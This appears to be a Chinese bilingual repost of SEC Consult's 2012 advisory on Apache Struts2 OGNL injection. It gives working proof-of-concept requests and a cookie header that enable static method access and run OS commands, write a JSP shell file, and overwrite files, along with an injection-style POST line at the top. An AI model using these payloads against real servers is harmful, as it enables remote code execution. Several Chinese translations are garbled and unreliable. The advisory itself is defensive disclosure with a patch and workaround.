http://localhost/index.html post:ageNo=2&words=%25E6%25B7%2598%25E5%25AE%259D%25E5%25AE%25A2&count='%2B#application%2B'&dtype
原版出自EXP,俺E文不是很好,木有用GG翻译很多错误 E文好点的同学麻烦一起完善下。此漏洞影响范围非常大,危害性极强!
SEC Consult Vulnerability Lab Security Advisory < 20120104-0 >
=======================================================================
title: Multiple critical vulnerabilities in Apache Struts2
标题:apache struts2 多个关键漏洞
product: Apache Struts2
产品:Apache Struts2
* OpenSymphony XWork
* OpenSymphony OGNL
vulnerable version: 2.3.1 and below
漏洞版本:2.3.1及其一下版本
fixed version: 2.3.1.1
已修复的版本:2.3.1.1
impact: critical
影响:关键
homepage: http://struts.apache.org/
主页:
found: 2011-11-18
发现日期
by: Johannes Dahse, Andreas Nusser
漏洞作者:Johannes Dahse, Andreas Nusser
SEC Consult Vulnerability Lab
SEC请教漏洞实验室
=======================================================================
Vendor description:
官方描述:
-------------------
Apache Struts2 is a web framework for creating Java web applications. It is
apache Struts2 是一个用于创建Java web应用的web框架。它用于
using the OpenSymphony XWork and OGNL libraries. By default, XWork's
OpenSymphony XWork 库。默认XWork's
ParametersInterceptor treats parameter names provided to actions as OGNL
拦截器参数对参数名需要提供给action
expressions. A OGNL (Object Graph Navigation Language) expression is a limited
一个ONGL(国际化标准)是应该限制的
language similar to Java that is tokenized and parsed by the OGNL parser which
语言类似Java
invokes appropiate Java methods. This allows e.g. convenient access to
调用 有效的java 方法。 这是一个允许转换通过的例子
properties that have a getter/setter method implemented. By providing a
有getter/setter方法被实现。通过提供一个
parameter like "product.id=1" the OGNL parser will call the appropiate setter
参数 就像product.id=1 OGNL分析器将会调用一个有效的setter方法
getProduct().setId(1) in the current action context. OGNL is also able to call
getProduct().setId(1) 在当前的action文本域。OGNL将会尽可能的去调用
arbitrary methods, constructors and access context variables. For more details
有用的方法 构造函数 和 访问文本值。 更多的详情
please refer to http://commons.apache.org/ognl/language-guide.html.
请参照http://commons.apache.org/ognl/language-guide.html
Vulnerability overview/description:
漏洞概述:
-----------------------------------
To prevent attackers calling arbitrary methods within parameters the flag
为了防止攻击者调用任意方法任意参数 把标志
"xwork.MethodAccessor.denyMethodExecution" is set to "true" and the
xwork.MethodAccessor.denyMethodExecution 设置为"true" 和
SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by
成员访问安全
域“允许静态的方法访问”设置为"false"
default. Also, to prevent access to context variables an improved character
同时为了防止访问上下文变量和提供
whitelist for paramteter names is applied in XWork's ParametersInterceptor since
白名单 参数名 请求 XWork 的参数
Struts 2.2.1.1:
acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(]+";
接收参数名:"[a-zA-Z0-9\\.\\]\\[\\(]+";(正则表达式过滤条件)
Under certain circumstances these restrictions can be bypassed to execute
在某些情况下这些限制可以作为bypassed来执行
malicious Java code.
更多的Java代码
1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)
远程代码执行在 Struts版本小于等于2.2.1.1
When an exception occurs while applying parameter values to properties the
当请求值转换为属性时会发生一个异常
value is evaluated as OGNL expression. For example this occurs when setting a
例如执行
string value to a property with type integer. Since the values are not
设置一个String为一个integer.值不会过滤
filtered an attacker can abuse the power of the OGNL language to execute
一个攻击能够轻易的通过OGNL 语言去执行
arbitrary Java code leading to remote command execution. This issue has been
任意的Java代码导致远程命令执行漏洞
reported () and was fixed in
报告: 已在Struts 2.2.3.1修复,
Struts 2.2.3.1. However the ability to execute arbitrary Java code has been overlooked.
然而执行任意Java代码的能力已然被忽略了。
2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)
远程代码执行在Struts版本小于等于2.3.1
The character whitelist for parameter names is not applied to Struts
参数名白名单不能被运用到Struts
CookieInterceptor. When Struts is configured to handle cookie names, an
Cookie拦截 当Struts 配置去处理cookie名
attacker can execute arbitrary system commands with static method access to
攻击者可以执行任意的系统命令通过一个静态的方法去访问java的函数
Java functions. Therefore the flag "allowStaticMethodAccess" can be set to true within the request.
因此在接收的时候标志"allowStaticMethodAccess" 将会被设置为true
3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)
3.)任意的写文件漏洞当Struts版本小于等于2.3.1
Accessing the flag "allowStaticMethodAccess" within parameters is prohibited
访问标志 "allowStaticMethodAccess" 参数是禁止的
since Struts 2.2.3.1. An attacker can still access public constructors with
自从Struts 2.2.3.1 攻击者任然可以通过公开的构造函数
(public)
only one parameter of type String to create new Java objects and access their
只有一个字符串类型的参数去创建信的Java对象和访问其他的
setters with only one parameter of type String. This can be abused for example
设定器 只有一个参数类型为String字符串 这可以随便用于一个示例
to create and overwrite arbitrary files. To inject forbidden characters to the
去创建覆盖任意文件 注入禁止
filename an uninitialized string property can be used.
文件名未初始化的
的字符串将会被使用。
4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)
远程代码执行Struts版本小于等于2.3.1(调试拦截)
While not being a security vulnerability itself, please note that applications
running in developer mode and using Struts DebuggingInterceptor are prone to
在开发模式下使用Struts调试拦截
remote command execution as well. While applications should never run in
远程代码执行完成。 当然 应用应该是从来都没有被运行在开发模式的
developer mode during production, developers should be aware that doing so not
开发者应该去做这些,不只是
only has performance issues (as documented) but also a critical security
性能问题而是一个关键的安全问题
impact.
Proof of concept:
-----------------
1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)
Struts版本为2.2.1.1及其一下远程命令执行(ExceptionDelegator)异常
Given Test.java has an property "id" of type Integer or Long and appropriate
给Test.java 参数 “id” 类型为Integer 或者Long 或者适当的类型
getter and setter methods:
getter 和 setter方法
long id;
Given test.jsp with result name=input is configured for action "Test":
给 test.jsp 返回值 name=input 配置个action"Test":
以下为struts.xml配置的部分内容:
struts.xml:
<action name="Test" class="example.Test">
<result name="input">test.jsp</result>
</action>
The following request will trigger an exception, the value will be evaluated
接着接收时将会出发一个异常 值将会被传递给OGNL
as OGNL expression and arbitrary Java code can be executed:
表达和任意的Java代码将会被执行:
测试参数:
/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'
An attacker can also overwrite flags that will allow direct OS command execution:
一个攻击者能够覆盖标志然后执行操作系统命令。
测试语句:
/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
If test.jsp displays the property "id" the result of the Java code evaluation
如果test.jsp 现实 参数id 返回Java代码
can be accessed:
将会被通过
以下为Struts标签:
<%@ taglib prefix="s" uri="/struts-tags" %>
<s:property value="id" />
2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)
远程代码执行在Struts 版本小于等于 2.3.1的 Cookie拦截
Given struts.xml is configured to handle all cookie names (independent of
给struts.xml配置cookie 名
limited cookie values):
限制cookie值:
<action name="Test" class="example.Test">
<interceptor-ref name="cookie">
<param name="cookiesName">*</param>
<param name="cookiesValue">1,2</param>
</interceptor-ref>
<result ...>
</action>
The following HTTP header will execute an OS command when sent to Test.action:
接下来HTTP头将会执行一个操作系统命令,当发送Test.action:
Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
(此处执行了一个调用Windows下计算器的命令)
3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)
Given Test.java has an uninitialized property "name" of type String:
String name; // +getter+setter
The following request will create/overwrite the file "C:/sec-consult.txt"
(empty file):
空文件
/Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1
The existence of the property 'x' used in these examples is of no importance.
4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)
Struts 版本小于等于2.3.1远程代码执行:
Given struts.xml is configured to run in developer mode and to use the
给struts.xml 配置为开发模式运行使用
debugging interceptor:
调试拦截:
<constant name="struts.devMode" value="true" />
<action name="Test" class="example.Test">
<interceptor-ref name="debugging" />
<result ...>
</action>
The following request will execute arbitrary OGNL expressions leading to remote command execution:
接着接收任意的参数OGNL表达式将会导致远程的命令执行
测试参数:
/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
Vulnerable / tested versions:
-----------------------------
所有的Struts2残片都将会被影响
All products using Struts2 are affected by at least one critical vulnerability
listed above!
包含了所有!
Proof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and Struts
2.2.1.1
Proof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 26 July 2010
and Struts 2.2.1.1, 2.2.3.1 and 2.3.1
Vendor contact timeline:
------------------------
2011-12-14: Contacting vendor through security at struts dot apache dot org
联系官方检测
struts.apache.org
2011-12-14: Vendor reply, sending advisory draft
官方确认
2011-12-14: Vendor released Apache Struts 2.3.1 in parallel
官方发布 Apache Struts 2.3.1
2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted
漏洞在confirmed in Struts 2.3.1确定存在 联系官方
2011-12-16: Vendor reply, discussing workaround
官方回复 讨论工作
2011-12-20: Discussing release of fixed version
讨论发布修复版本
2011-12-21: Providing additional information
提供更多的附加信息
2012-01-03: Vendor informs that update is ready
官方准备更新
2012-01-03: Patch (2.3.1.1) is available
2.3.1.1可用
Solution:
解决方案:
---------
Update to Struts 2.3.1.1
升级到Struts 2.3.1.1
Workaround:
解决办法:
-----------
Update to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the
升级到Struts2.3.1然后再申请个强大的接收参数过滤器去
Parameters- and CookieInterceptor:
拦截参数和Cookie:
acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[_']+";
接收参数名:= "[a-zA-Z0-9\\.\\]\\[_']+";(正则表达式)
Don't run your applications in developer mode.
不要把你的java web应用在开发模式下运行
Advisory URL:
-------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
奥地利
Tel.: +43 / 1 / 890 30 43 - 0
电话: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
传真:+43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
邮箱:自己去sec-consult.com上找
EOF J. Dahse, A. Nusser / 2012
